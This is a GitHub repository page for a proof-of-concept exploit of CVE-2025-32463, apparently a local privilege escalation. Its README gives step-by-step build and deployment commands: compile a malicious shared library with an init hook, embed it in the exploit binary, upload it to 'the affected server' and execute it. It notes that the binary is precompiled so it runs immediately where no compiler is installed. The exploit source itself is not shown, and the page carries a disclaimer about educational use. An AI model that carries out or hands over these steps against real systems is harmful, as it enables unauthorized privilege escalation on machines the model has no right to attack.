Skip to content

blackcat4347/CVE-2025-32463_PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2025-32463

NVD CVE-2025-32463
In most cases, GCC is not installed by default on target servers.
This proof of concept provides a precompiled version to ensure it can be executed immediately on affected systems.


Usage

1. Compile the woot1337.c file:

gcc -shared -fPIC -Wl,-init,woot -o libwoot1337.so woot1337.c

2. Convert the .so file into a C array (byte format):

xxd -i libwoot1337.so > libwoot1337.h

3. Compile the cve_2025_32463.c file:

gcc cve_2025_32463.c -o cve_2025_32463

4. Upload to the affected server and grant execution permissions:

chmod +x cve_2025_32463
./cve_2025_32463

Disclaimer

This Proof of Concept (PoC) is provided solely for educational and research purposes. Executing this code on any system without explicit authorization is illegal and unethical. The authors disclaim any responsibility for misuse or damage caused by the use of this material.

About

No description, website, or topics provided.

Resources

License

Stars

0 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages